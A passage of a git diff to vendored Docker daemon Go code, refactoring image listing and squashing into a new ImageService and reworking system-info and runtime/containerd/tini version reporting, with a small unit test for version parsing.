+			return nil, invalidFilter{"dangling", imageFilters.Get("dangling")}
 		}
 	}
 	if danglingOnly {
-		allImages = daemon.imageStore.Heads()
+		allImages = i.imageStore.Heads()
 	} else {
-		allImages = daemon.imageStore.Map()
+		allImages = i.imageStore.Map()
 	}
 
 	var beforeFilter, sinceFilter *image.Image
 	err = imageFilters.WalkValues("before", func(value string) error {
-		beforeFilter, err = daemon.GetImage(value)
+		beforeFilter, err = i.GetImage(value)
 		return err
 	})
 	if err != nil {
@@ -76,7 +77,7 @@ func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs
 	}
 
 	err = imageFilters.WalkValues("since", func(value string) error {
-		sinceFilter, err = daemon.GetImage(value)
+		sinceFilter, err = i.GetImage(value)
 		return err
 	})
 	if err != nil {
@@ -102,7 +103,7 @@ func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs
 			}
 		}
 
-		if imageFilters.Include("label") {
+		if imageFilters.Contains("label") {
 			// Very old image that do not have image.Config (or even labels)
 			if img.Config == nil {
 				continue
@@ -113,16 +114,28 @@ func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs
 			}
 		}
 
+		// Skip any images with an unsupported operating system to avoid a potential
+		// panic when indexing through the layerstore. Don't error as we want to list
+		// the other images. This should never happen, but here as a safety precaution.
+		if !system.IsOSSupported(img.OperatingSystem()) {
+			continue
+		}
+
 		layerID := img.RootFS.ChainID()
 		var size int64
 		if layerID != "" {
-			l, err := daemon.layerStore.Get(layerID)
+			l, err := i.layerStores[img.OperatingSystem()].Get(layerID)
 			if err != nil {
+				// The layer may have been deleted between the call to `Map()` or
+				// `Heads()` and the call to `Get()`, so we just ignore this error
+				if err == layer.ErrLayerDoesNotExist {
+					continue
+				}
 				return nil, err
 			}
 
 			size, err = l.Size()
-			layer.ReleaseAndLog(daemon.layerStore, l)
+			layer.ReleaseAndLog(i.layerStores[img.OperatingSystem()], l)
 			if err != nil {
 				return nil, err
 			}
@@ -130,12 +143,12 @@ func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs
 
 		newImage := newImage(img, size)
 
-		for _, ref := range daemon.referenceStore.References(id.Digest()) {
-			if imageFilters.Include("reference") {
+		for _, ref := range i.referenceStore.References(id.Digest()) {
+			if imageFilters.Contains("reference") {
 				var found bool
 				var matchErr error
 				for _, pattern := range imageFilters.Get("reference") {
-					found, matchErr = reference.Match(pattern, ref)
+					found, matchErr = reference.FamiliarMatch(pattern, ref)
 					if matchErr != nil {
 						return nil, matchErr
 					}
@@ -145,20 +158,20 @@ func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs
 				}
 			}
 			if _, ok := ref.(reference.Canonical); ok {
-				newImage.RepoDigests = append(newImage.RepoDigests, ref.String())
+				newImage.RepoDigests = append(newImage.RepoDigests, reference.FamiliarString(ref))
 			}
 			if _, ok := ref.(reference.NamedTagged); ok {
-				newImage.RepoTags = append(newImage.RepoTags, ref.String())
+				newImage.RepoTags = append(newImage.RepoTags, reference.FamiliarString(ref))
 			}
 		}
 		if newImage.RepoDigests == nil && newImage.RepoTags == nil {
-			if all || len(daemon.imageStore.Children(id)) == 0 {
+			if all || len(i.imageStore.Children(id)) == 0 {
 
-				if imageFilters.Include("dangling") && !danglingOnly {
+				if imageFilters.Contains("dangling") && !danglingOnly {
 					//dangling=false case, so dangling image is not needed
 					continue
 				}
-				if imageFilters.Include("reference") { // skip images with no references if filtering by reference
+				if imageFilters.Contains("reference") { // skip images with no references if filtering by reference
 					continue
 				}
 				newImage.RepoDigests = []string{"<none>@<none>"}
@@ -171,10 +184,10 @@ func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs
 		}
 
 		if withExtraAttrs {
-			// lazyly init variables
+			// lazily init variables
 			if imagesMap == nil {
-				allContainers = daemon.List()
-				allLayers = daemon.layerStore.Map()
+				allContainers = i.containers.List()
+				allLayers = i.layerStores[img.OperatingSystem()].Map()
 				imagesMap = make(map[*image.Image]*types.ImageSummary)
 				layerRefs = make(map[layer.ChainID]int)
 			}
@@ -236,16 +249,20 @@ func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs
 // This new image contains only the layers from it's parent + 1 extra layer which contains the diff of all the layers in between.
 // The existing image(s) is not destroyed.
 // If no parent is specified, a new image with the diff of all the specified image's layers merged into a new layer that has no parents.
-func (daemon *Daemon) SquashImage(id, parent string) (string, error) {
-	img, err := daemon.imageStore.Get(image.ID(id))
-	if err != nil {
+func (i *ImageService) SquashImage(id, parent string) (string, error) {
+
+	var (
+		img *image.Image
+		err error
+	)
+	if img, err = i.imageStore.Get(image.ID(id)); err != nil {
 		return "", err
 	}
 
 	var parentImg *image.Image
 	var parentChainID layer.ChainID
 	if len(parent) != 0 {
-		parentImg, err = daemon.imageStore.Get(image.ID(parent))
+		parentImg, err = i.imageStore.Get(image.ID(parent))
 		if err != nil {
 			return "", errors.Wrap(err, "error getting specified parent layer")
 		}
@@ -254,12 +271,14 @@ func (daemon *Daemon) SquashImage(id, parent string) (string, error) {
 		rootFS := image.NewRootFS()
 		parentImg = &image.Image{RootFS: rootFS}
 	}
-
-	l, err := daemon.layerStore.Get(img.RootFS.ChainID())
+	if !system.IsOSSupported(img.OperatingSystem()) {
+		return "", errors.Wrap(err, system.ErrNotSupportedOperatingSystem.Error())
+	}
+	l, err := i.layerStores[img.OperatingSystem()].Get(img.RootFS.ChainID())
 	if err != nil {
 		return "", errors.Wrap(err, "error getting image layer")
 	}
-	defer daemon.layerStore.Release(l)
+	defer i.layerStores[img.OperatingSystem()].Release(l)
 
 	ts, err := l.TarStreamFrom(parentChainID)
 	if err != nil {
@@ -267,18 +286,16 @@ func (daemon *Daemon) SquashImage(id, parent string) (string, error) {
 	}
 	defer ts.Close()
 
-	newL, err := daemon.layerStore.Register(ts, parentChainID)
+	newL, err := i.layerStores[img.OperatingSystem()].Register(ts, parentChainID)
 	if err != nil {
 		return "", errors.Wrap(err, "error registering layer")
 	}
-	defer daemon.layerStore.Release(newL)
+	defer i.layerStores[img.OperatingSystem()].Release(newL)
 
-	var newImage image.Image
-	newImage = *img
+	newImage := *img
 	newImage.RootFS = nil
 
-	var rootFS image.RootFS
-	rootFS = *parentImg.RootFS
+	rootFS := *parentImg.RootFS
 	rootFS.DiffIDs = append(rootFS.DiffIDs, newL.DiffID())
 	newImage.RootFS = &rootFS
 
@@ -308,20 +325,20 @@ func (daemon *Daemon) SquashImage(id, parent string) (string, error) {
 		return "", errors.Wrap(err, "error marshalling image config")
 	}
 
-	newImgID, err := daemon.imageStore.Create(b)
+	newImgID, err := i.imageStore.Create(b)
 	if err != nil {
 		return "", errors.Wrap(err, "error creating new image after squash")
 	}
 	return string(newImgID), nil
 }
 
-func newImage(image *image.Image, virtualSize int64) *types.ImageSummary {
+func newImage(image *image.Image, size int64) *types.ImageSummary {
 	newImage := new(types.ImageSummary)
 	newImage.ParentID = image.Parent.String()
 	newImage.ID = image.ID().String()
 	newImage.Created = image.Created.Unix()
-	newImage.Size = virtualSize
-	newImage.VirtualSize = virtualSize
+	newImage.Size = size
+	newImage.VirtualSize = size
 	newImage.SharedSize = -1
 	newImage.Containers = -1
 	if image.Config != nil {
diff --git a/vendor/github.com/docker/docker/daemon/images/locals.go b/vendor/github.com/docker/docker/daemon/images/locals.go
new file mode 100644
index 0000000000..5ffc460a09
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/images/locals.go
@@ -0,0 +1,32 @@
+package images // import "github.com/docker/docker/daemon/images"
+
+import (
+	"fmt"
+
+	"github.com/docker/go-metrics"
+)
+
+type invalidFilter struct {
+	filter string
+	value  interface{}
+}
+
+func (e invalidFilter) Error() string {
+	msg := "Invalid filter '" + e.filter
+	if e.value != nil {
+		msg += fmt.Sprintf("=%s", e.value)
+	}
+	return msg + "'"
+}
+
+func (e invalidFilter) InvalidParameter() {}
+
+var imageActions metrics.LabeledTimer
+
+func init() {
+	ns := metrics.NewNamespace("engine", "daemon", nil)
+	imageActions = ns.NewLabeledTimer("image_actions", "The number of seconds it takes to process each image action", "action")
+	// TODO: is it OK to register a namespace with the same name? Or does this
+	// need to be exported from somewhere?
+	metrics.Register(ns)
+}
diff --git a/vendor/github.com/docker/docker/daemon/images/service.go b/vendor/github.com/docker/docker/daemon/images/service.go
new file mode 100644
index 0000000000..263217dccd
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/images/service.go
@@ -0,0 +1,251 @@
+package images // import "github.com/docker/docker/daemon/images"
+
+import (
+	"context"
+	"os"
+	"runtime"
+
+	"github.com/docker/docker/container"
+	daemonevents "github.com/docker/docker/daemon/events"
+	"github.com/docker/docker/distribution"
+	"github.com/docker/docker/distribution/metadata"
+	"github.com/docker/docker/distribution/xfer"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+	dockerreference "github.com/docker/docker/reference"
+	"github.com/docker/docker/registry"
+	"github.com/docker/libtrust"
+	"github.com/opencontainers/go-digest"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+)
+
+type containerStore interface {
+	// used by image delete
+	First(container.StoreFilter) *container.Container
+	// used by image prune, and image list
+	List() []*container.Container
+	// TODO: remove, only used for CommitBuildStep
+	Get(string) *container.Container
+}
+
+// ImageServiceConfig is the configuration used to create a new ImageService
+type ImageServiceConfig struct {
+	ContainerStore            containerStore
+	DistributionMetadataStore metadata.Store
+	EventsService             *daemonevents.Events
+	ImageStore                image.Store
+	LayerStores               map[string]layer.Store
+	MaxConcurrentDownloads    int
+	MaxConcurrentUploads      int
+	ReferenceStore            dockerreference.Store
+	RegistryService           registry.Service
+	TrustKey                  libtrust.PrivateKey
+}
+
+// NewImageService returns a new ImageService from a configuration
+func NewImageService(config ImageServiceConfig) *ImageService {
+	logrus.Debugf("Max Concurrent Downloads: %d", config.MaxConcurrentDownloads)
+	logrus.Debugf("Max Concurrent Uploads: %d", config.MaxConcurrentUploads)
+	return &ImageService{
+		containers:                config.ContainerStore,
+		distributionMetadataStore: config.DistributionMetadataStore,
+		downloadManager:           xfer.NewLayerDownloadManager(config.LayerStores, config.MaxConcurrentDownloads),
+		eventsService:             config.EventsService,
+		imageStore:                config.ImageStore,
+		layerStores:               config.LayerStores,
+		referenceStore:            config.ReferenceStore,
+		registryService:           config.RegistryService,
+		trustKey:                  config.TrustKey,
+		uploadManager:             xfer.NewLayerUploadManager(config.MaxConcurrentUploads),
+	}
+}
+
+// ImageService provides a backend for image management
+type ImageService struct {
+	containers                containerStore
+	distributionMetadataStore metadata.Store
+	downloadManager           *xfer.LayerDownloadManager
+	eventsService             *daemonevents.Events
+	imageStore                image.Store
+	layerStores               map[string]layer.Store // By operating system
+	pruneRunning              int32
+	referenceStore            dockerreference.Store
+	registryService           registry.Service
+	trustKey                  libtrust.PrivateKey
+	uploadManager             *xfer.LayerUploadManager
+}
+
+// DistributionServices provides daemon image storage services
+type DistributionServices struct {
+	DownloadManager   distribution.RootFSDownloadManager
+	V2MetadataService metadata.V2MetadataService
+	LayerStore        layer.Store // TODO: lcow
+	ImageStore        image.Store
+	ReferenceStore    dockerreference.Store
+}
+
+// DistributionServices return services controlling daemon image storage
+func (i *ImageService) DistributionServices() DistributionServices {
+	return DistributionServices{
+		DownloadManager:   i.downloadManager,
+		V2MetadataService: metadata.NewV2MetadataService(i.distributionMetadataStore),
+		LayerStore:        i.layerStores[runtime.GOOS],
+		ImageStore:        i.imageStore,
+		ReferenceStore:    i.referenceStore,
+	}
+}
+
+// CountImages returns the number of images stored by ImageService
+// called from info.go
+func (i *ImageService) CountImages() int {
+	return i.imageStore.Len()
+}
+
+// Children returns the children image.IDs for a parent image.
+// called from list.go to filter containers
+// TODO: refactor to expose an ancestry for image.ID?
+func (i *ImageService) Children(id image.ID) []image.ID {
+	return i.imageStore.Children(id)
+}
+
+// CreateLayer creates a filesystem layer for a container.
+// called from create.go
+// TODO: accept an opt struct instead of container?
+func (i *ImageService) CreateLayer(container *container.Container, initFunc layer.MountInit) (layer.RWLayer, error) {
+	var layerID layer.ChainID
+	if container.ImageID != "" {
+		img, err := i.imageStore.Get(container.ImageID)
+		if err != nil {
+			return nil, err
+		}
+		layerID = img.RootFS.ChainID()
+	}
+
+	rwLayerOpts := &layer.CreateRWLayerOpts{
+		MountLabel: container.MountLabel,
+		InitFunc:   initFunc,
+		StorageOpt: container.HostConfig.StorageOpt,
+	}
+
+	// Indexing by OS is safe here as validation of OS has already been performed in create() (the only
+	// caller), and guaranteed non-nil
+	return i.layerStores[container.OS].CreateRWLayer(container.ID, layerID, rwLayerOpts)
+}
+
+// GetLayerByID returns a layer by ID and operating system
+// called from daemon.go Daemon.restore(), and Daemon.containerExport()
+func (i *ImageService) GetLayerByID(cid string, os string) (layer.RWLayer, error) {
+	return i.layerStores[os].GetRWLayer(cid)
+}
+
+// LayerStoreStatus returns the status for each layer store
+// called from info.go
+func (i *ImageService) LayerStoreStatus() map[string][][2]string {
+	result := make(map[string][][2]string)
+	for os, store := range i.layerStores {
+		result[os] = store.DriverStatus()
+	}
+	return result
+}
+
+// GetLayerMountID returns the mount ID for a layer
+// called from daemon.go Daemon.Shutdown(), and Daemon.Cleanup() (cleanup is actually continerCleanup)
+// TODO: needs to be refactored to Unmount (see callers), or removed and replaced
+// with GetLayerByID
+func (i *ImageService) GetLayerMountID(cid string, os string) (string, error) {
+	return i.layerStores[os].GetMountID(cid)
+}
+
+// Cleanup resources before the process is shutdown.
+// called from daemon.go Daemon.Shutdown()
+func (i *ImageService) Cleanup() {
+	for os, ls := range i.layerStores {
+		if ls != nil {
+			if err := ls.Cleanup(); err != nil {
+				logrus.Errorf("Error during layer Store.Cleanup(): %v %s", err, os)
+			}
+		}
+	}
+}
+
+// GraphDriverForOS returns the name of the graph drvier
+// moved from Daemon.GraphDriverName, used by:
+// - newContainer
+// - to report an error in Daemon.Mount(container)
+func (i *ImageService) GraphDriverForOS(os string) string {
+	return i.layerStores[os].DriverName()
+}
+
+// ReleaseLayer releases a layer allowing it to be removed
+// called from delete.go Daemon.cleanupContainer(), and Daemon.containerExport()
+func (i *ImageService) ReleaseLayer(rwlayer layer.RWLayer, containerOS string) error {
+	metadata, err := i.layerStores[containerOS].ReleaseRWLayer(rwlayer)
+	layer.LogReleaseMetadata(metadata)
+	if err != nil && err != layer.ErrMountDoesNotExist && !os.IsNotExist(errors.Cause(err)) {
+		return errors.Wrapf(err, "driver %q failed to remove root filesystem",
+			i.layerStores[containerOS].DriverName())
+	}
+	return nil
+}
+
+// LayerDiskUsage returns the number of bytes used by layer stores
+// called from disk_usage.go
+func (i *ImageService) LayerDiskUsage(ctx context.Context) (int64, error) {
+	var allLayersSize int64
+	layerRefs := i.getLayerRefs()
+	for _, ls := range i.layerStores {
+		allLayers := ls.Map()
+		for _, l := range allLayers {
+			select {
+			case <-ctx.Done():
+				return allLayersSize, ctx.Err()
+			default:
+				size, err := l.DiffSize()
+				if err == nil {
+					if _, ok := layerRefs[l.ChainID()]; ok {
+						allLayersSize += size
+					} else {
+						logrus.Warnf("found leaked image layer %v", l.ChainID())
+					}
+				} else {
+					logrus.Warnf("failed to get diff size for layer %v", l.ChainID())
+				}
+			}
+		}
+	}
+	return allLayersSize, nil
+}
+
+func (i *ImageService) getLayerRefs() map[layer.ChainID]int {
+	tmpImages := i.imageStore.Map()
+	layerRefs := map[layer.ChainID]int{}
+	for id, img := range tmpImages {
+		dgst := digest.Digest(id)
+		if len(i.referenceStore.References(dgst)) == 0 && len(i.imageStore.Children(id)) != 0 {
+			continue
+		}
+
+		rootFS := *img.RootFS
+		rootFS.DiffIDs = nil
+		for _, id := range img.RootFS.DiffIDs {
+			rootFS.Append(id)
+			chid := rootFS.ChainID()
+			layerRefs[chid]++
+		}
+	}
+
+	return layerRefs
+}
+
+// UpdateConfig values
+//
+// called from reload.go
+func (i *ImageService) UpdateConfig(maxDownloads, maxUploads *int) {
+	if i.downloadManager != nil && maxDownloads != nil {
+		i.downloadManager.SetConcurrency(*maxDownloads)
+	}
+	if i.uploadManager != nil && maxUploads != nil {
+		i.uploadManager.SetConcurrency(*maxUploads)
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/info.go b/vendor/github.com/docker/docker/daemon/info.go
index 1ab9f29592..7b011fe324 100644
--- a/vendor/github.com/docker/docker/daemon/info.go
+++ b/vendor/github.com/docker/docker/daemon/info.go
@@ -1,16 +1,16 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"fmt"
 	"os"
 	"runtime"
-	"sync/atomic"
+	"strings"
 	"time"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/api"
 	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/container"
+	"github.com/docker/docker/cli/debug"
+	"github.com/docker/docker/daemon/logger"
 	"github.com/docker/docker/dockerversion"
 	"github.com/docker/docker/pkg/fileutils"
 	"github.com/docker/docker/pkg/parsers/kernel"
@@ -19,9 +19,8 @@ import (
 	"github.com/docker/docker/pkg/sysinfo"
 	"github.com/docker/docker/pkg/system"
 	"github.com/docker/docker/registry"
-	"github.com/docker/docker/utils"
-	"github.com/docker/docker/volume/drivers"
 	"github.com/docker/go-connections/sockets"
+	"github.com/sirupsen/logrus"
 )
 
 // SystemInfo returns information about the host server the daemon is running on.
@@ -57,18 +56,7 @@ func (daemon *Daemon) SystemInfo() (*types.Info, error) {
 	}
 
 	sysInfo := sysinfo.New(true)
-
-	var cRunning, cPaused, cStopped int32
-	daemon.containers.ApplyAll(func(c *container.Container) {
-		switch c.StateString() {
-		case "paused":
-			atomic.AddInt32(&cPaused, 1)
-		case "running":
-			atomic.AddInt32(&cRunning, 1)
-		default:
-			atomic.AddInt32(&cStopped, 1)
-		}
-	})
+	cRunning, cPaused, cStopped := stateCtr.get()
 
 	securityOptions := []string{}
 	if sysInfo.AppArmor {
@@ -84,25 +72,37 @@ func (daemon *Daemon) SystemInfo() (*types.Info, error) {
 	if selinuxEnabled() {
 		securityOptions = append(securityOptions, "name=selinux")
 	}
-	uid, gid := daemon.GetRemappedUIDGID()
-	if uid != 0 || gid != 0 {
+	rootIDs := daemon.idMappings.RootPair()
+	if rootIDs.UID != 0 || rootIDs.GID != 0 {
 		securityOptions = append(securityOptions, "name=userns")
 	}
 
+	var ds [][2]string
+	drivers := ""
+	statuses := daemon.imageService.LayerStoreStatus()
+	for os, gd := range daemon.graphDrivers {
+		ds = append(ds, statuses[os]...)
+		drivers += gd
+		if len(daemon.graphDrivers) > 1 {
+			drivers += fmt.Sprintf(" (%s) ", os)
+		}
+	}
+	drivers = strings.TrimSpace(drivers)
+
 	v := &types.Info{
 		ID:                 daemon.ID,
-		Containers:         int(cRunning + cPaused + cStopped),
-		ContainersRunning:  int(cRunning),
-		ContainersPaused:   int(cPaused),
-		ContainersStopped:  int(cStopped),
-		Images:             len(daemon.imageStore.Map()),
-		Driver:             daemon.GraphDriverName(),
-		DriverStatus:       daemon.layerStore.DriverStatus(),
+		Containers:         cRunning + cPaused + cStopped,
+		ContainersRunning:  cRunning,
+		ContainersPaused:   cPaused,
+		ContainersStopped:  cStopped,
+		Images:             daemon.imageService.CountImages(),
+		Driver:             drivers,
+		DriverStatus:       ds,
 		Plugins:            daemon.showPluginsInfo(),
 		IPv4Forwarding:     !sysInfo.IPv4ForwardingDisabled,
 		BridgeNfIptables:   !sysInfo.BridgeNFCallIPTablesDisabled,
 		BridgeNfIP6tables:  !sysInfo.BridgeNFCallIP6TablesDisabled,
-		Debug:              utils.IsDebugEnabled(),
+		Debug:              debug.IsEnabled(),
 		NFd:                fileutils.GetTotalUsedFds(),
 		NGoroutines:        runtime.NumGoroutine(),
 		SystemTime:         time.Now().Format(time.RFC3339Nano),
@@ -117,6 +117,7 @@ func (daemon *Daemon) SystemInfo() (*types.Info, error) {
 		RegistryConfig:     daemon.RegistryService.ServiceConfig(),
 		NCPU:               sysinfo.NumCPU(),
 		MemTotal:           meminfo.MemTotal,
+		GenericResources:   daemon.genericResources,
 		DockerRootDir:      daemon.configStore.Root,
 		Labels:             daemon.configStore.Labels,
 		ExperimentalBuild:  daemon.configStore.Experimental,
@@ -147,24 +148,46 @@ func (daemon *Daemon) SystemInfo() (*types.Info, error) {
 
 // SystemVersion returns version information about the daemon.
 func (daemon *Daemon) SystemVersion() types.Version {
+	kernelVersion := "<unknown>"
+	if kv, err := kernel.GetKernelVersion(); err != nil {
+		logrus.Warnf("Could not get kernel version: %v", err)
+	} else {
+		kernelVersion = kv.String()
+	}
+
 	v := types.Version{
+		Components: []types.ComponentVersion{
+			{
+				Name:    "Engine",
+				Version: dockerversion.Version,
+				Details: map[string]string{
+					"GitCommit":     dockerversion.GitCommit,
+					"ApiVersion":    api.DefaultVersion,
+					"MinAPIVersion": api.MinVersion,
+					"GoVersion":     runtime.Version(),
+					"Os":            runtime.GOOS,
+					"Arch":          runtime.GOARCH,
+					"BuildTime":     dockerversion.BuildTime,
+					"KernelVersion": kernelVersion,
+					"Experimental":  fmt.Sprintf("%t", daemon.configStore.Experimental),
+				},
+			},
+		},
+
+		// Populate deprecated fields for older clients
 		Version:       dockerversion.Version,
 		GitCommit:     dockerversion.GitCommit,
+		APIVersion:    api.DefaultVersion,
 		MinAPIVersion: api.MinVersion,
 		GoVersion:     runtime.Version(),
 		Os:            runtime.GOOS,
 		Arch:          runtime.GOARCH,
 		BuildTime:     dockerversion.BuildTime,
+		KernelVersion: kernelVersion,
 		Experimental:  daemon.configStore.Experimental,
 	}
 
-	kernelVersion := "<unknown>"
-	if kv, err := kernel.GetKernelVersion(); err != nil {
-		logrus.Warnf("Could not get kernel version: %v", err)
-	} else {
-		kernelVersion = kv.String()
-	}
-	v.KernelVersion = kernelVersion
+	v.Platform.Name = dockerversion.PlatformName
 
 	return v
 }
@@ -172,9 +195,12 @@ func (daemon *Daemon) SystemVersion() types.Version {
 func (daemon *Daemon) showPluginsInfo() types.PluginsInfo {
 	var pluginsInfo types.PluginsInfo
 
-	pluginsInfo.Volume = volumedrivers.GetDriverList()
+	pluginsInfo.Volume = daemon.volumes.GetDriverList()
 	pluginsInfo.Network = daemon.GetNetworkDriverList()
+	// The authorization plugins are returned in the order they are
+	// used as they constitute a request/response modification chain.
 	pluginsInfo.Authorization = daemon.configStore.AuthorizationPlugins
+	pluginsInfo.Log = logger.ListDrivers()
 
 	return pluginsInfo
 }
diff --git a/vendor/github.com/docker/docker/daemon/info_unix.go b/vendor/github.com/docker/docker/daemon/info_unix.go
index 9c41c0e4cd..56be9c06fb 100644
--- a/vendor/github.com/docker/docker/daemon/info_unix.go
+++ b/vendor/github.com/docker/docker/daemon/info_unix.go
@@ -1,16 +1,17 @@
 // +build !windows
 
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"context"
 	"os/exec"
 	"strings"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/dockerversion"
 	"github.com/docker/docker/pkg/sysinfo"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 // FillPlatformInfo fills the platform related info.
@@ -27,16 +28,9 @@ func (daemon *Daemon) FillPlatformInfo(v *types.Info, sysInfo *sysinfo.SysInfo)
 	v.DefaultRuntime = daemon.configStore.GetDefaultRuntimeName()
 	v.InitBinary = daemon.configStore.GetInitPath()
 
-	v.ContainerdCommit.Expected = dockerversion.ContainerdCommitID
-	if sv, err := daemon.containerd.GetServerVersion(context.Background()); err == nil {
-		v.ContainerdCommit.ID = sv.Revision
-	} else {
-		logrus.Warnf("failed to retrieve containerd version: %v", err)
-		v.ContainerdCommit.ID = "N/A"
-	}
-
 	v.RuncCommit.Expected = dockerversion.RuncCommitID
-	if rv, err := exec.Command(DefaultRuntimeBinary, "--version").Output(); err == nil {
+	defaultRuntimeBinary := daemon.configStore.GetRuntime(v.DefaultRuntime).Path
+	if rv, err := exec.Command(defaultRuntimeBinary, "--version").Output(); err == nil {
 		parts := strings.Split(strings.TrimSpace(string(rv)), "\n")
 		if len(parts) == 3 {
 			parts = strings.Split(parts[1], ": ")
@@ -46,37 +40,54 @@ func (daemon *Daemon) FillPlatformInfo(v *types.Info, sysInfo *sysinfo.SysInfo)
 		}
 
 		if v.RuncCommit.ID == "" {
-			logrus.Warnf("failed to retrieve %s version: unknown output format: %s", DefaultRuntimeBinary, string(rv))
+			logrus.Warnf("failed to retrieve %s version: unknown output format: %s", defaultRuntimeBinary, string(rv))
 			v.RuncCommit.ID = "N/A"
 		}
 	} else {
-		logrus.Warnf("failed to retrieve %s version: %v", DefaultRuntimeBinary, err)
+		logrus.Warnf("failed to retrieve %s version: %v", defaultRuntimeBinary, err)
 		v.RuncCommit.ID = "N/A"
 	}
 
-	v.InitCommit.Expected = dockerversion.InitCommitID
-	if rv, err := exec.Command(DefaultInitBinary, "--version").Output(); err == nil {
-		parts := strings.Split(strings.TrimSpace(string(rv)), " - ")
-		if len(parts) == 2 {
-			if dockerversion.InitCommitID[0] == 'v' {
-				vs := strings.TrimPrefix(parts[0], "tini version ")
-				v.InitCommit.ID = "v" + vs
-			} else {
-				// Get the sha1
-				gitParts := strings.Split(parts[1], ".")
-				if len(gitParts) == 2 && gitParts[0] == "git" {
-					v.InitCommit.ID = gitParts[1]
-					v.InitCommit.Expected = dockerversion.InitCommitID[0:len(gitParts[1])]
-				}
-			}
-		}
+	v.ContainerdCommit.Expected = dockerversion.ContainerdCommitID
+	if rv, err := daemon.containerd.Version(context.Background()); err == nil {
+		v.ContainerdCommit.ID = rv.Revision
+	} else {
+		logrus.Warnf("failed to retrieve containerd version: %v", err)
+		v.ContainerdCommit.ID = "N/A"
+	}
+
+	defaultInitBinary := daemon.configStore.GetInitPath()
+	if rv, err := exec.Command(defaultInitBinary, "--version").Output(); err == nil {
+		ver, err := parseInitVersion(string(rv))
 
-		if v.InitCommit.ID == "" {
-			logrus.Warnf("failed to retrieve %s version: unknown output format: %s", DefaultInitBinary, string(rv))
-			v.InitCommit.ID = "N/A"
+		if err != nil {
+			logrus.Warnf("failed to retrieve %s version: %s", defaultInitBinary, err)
 		}
+		v.InitCommit = ver
 	} else {
-		logrus.Warnf("failed to retrieve %s version", DefaultInitBinary)
+		logrus.Warnf("failed to retrieve %s version: %s", defaultInitBinary, err)
 		v.InitCommit.ID = "N/A"
 	}
 }
+
+// parseInitVersion parses a Tini version string, and extracts the version.
+func parseInitVersion(v string) (types.Commit, error) {
+	version := types.Commit{ID: "", Expected: dockerversion.InitCommitID}
+	parts := strings.Split(strings.TrimSpace(v), " - ")
+
+	if len(parts) >= 2 {
+		gitParts := strings.Split(parts[1], ".")
+		if len(gitParts) == 2 && gitParts[0] == "git" {
+			version.ID = gitParts[1]
+			version.Expected = dockerversion.InitCommitID[0:len(version.ID)]
+		}
+	}
+	if version.ID == "" && strings.HasPrefix(parts[0], "tini version ") {
+		version.ID = "v" + strings.TrimPrefix(parts[0], "tini version ")
+	}
+	if version.ID == "" {
+		version.ID = "N/A"
+		return version, errors.Errorf("unknown output format: %s", v)
+	}
+	return version, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/info_unix_test.go b/vendor/github.com/docker/docker/daemon/info_unix_test.go
new file mode 100644
index 0000000000..a5a4e06f98
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/info_unix_test.go
@@ -0,0 +1,53 @@
+// +build !windows
+
+package daemon // import "github.com/docker/docker/daemon"
+
+import (
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/dockerversion"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestParseInitVersion(t *testing.T) {
+	tests := []struct {
+		version string
+		result  types.Commit
+		invalid bool
+	}{
+		{
+			version: "tini version 0.13.0 - git.949e6fa",
+			result:  types.Commit{ID: "949e6fa", Expected: dockerversion.InitCommitID[0:7]},
+		}, {
+			version: "tini version 0.13.0\n",
+			result:  types.Commit{ID: "v0.13.0", Expected: dockerversion.InitCommitID},
+		}, {
+			version: "tini version 0.13.2",
+			result:  types.Commit{ID: "v0.13.2", Expected: dockerversion.InitCommitID},
+		}, {
+			version: "tini version0.13.2",
+			result:  types.Commit{ID: "N/A", Expected: dockerversion.InitCommitID},
+			invalid: true,
+		}, {
+			version: "",
+			result:  types.Commit{ID: "N/A", Expected: dockerversion.InitCommitID},
+			invalid: true,
+		}, {
+			version: "hello world",
+			result:  types.Commit{ID: "N/A", Expected: dockerversion.InitCommitID},
+			invalid: true,
+		},
+	}
+
+	for _, test := range tests {
+		ver, err := parseInitVersion(string(test.version))
+		if test.invalid {
+			assert.Check(t, is.ErrorContains(err, ""))
+		} else {
+			assert.Check(t, err)
+		}
+		assert.Check(t, is.DeepEqual(test.result, ver))
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/info_windows.go b/vendor/github.com/docker/docker/daemon/info_windows.go
index c700911eb0..e452369fc8 100644
--- a/vendor/github.com/docker/docker/daemon/info_windows.go
+++ b/vendor/github.com/docker/docker/daemon/info_windows.go
@@ -1,4 +1,4 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"github.com/docker/docker/api/types"
diff --git a/vendor/github.com/docker/docker/daemon/initlayer/setup_solaris.go b/vendor/github.com/docker/docker/daemon/initlayer/setup_solaris.go
deleted file mode 100644
index 66d53f0eef..0000000000
--- a/vendor/github.com/docker/docker/daemon/initlayer/setup_solaris.go
+++ /dev/null
@@ -1,13 +0,0 @@
-// +build solaris,cgo
-
-package initlayer
-
-// Setup populates a directory with mountpoints suitable
-// for bind-mounting dockerinit into the container. The mountpoint is simply an
-// empty file at /.dockerinit
-//
-// This extra layer is used by all containers as the top-most ro layer. It protects
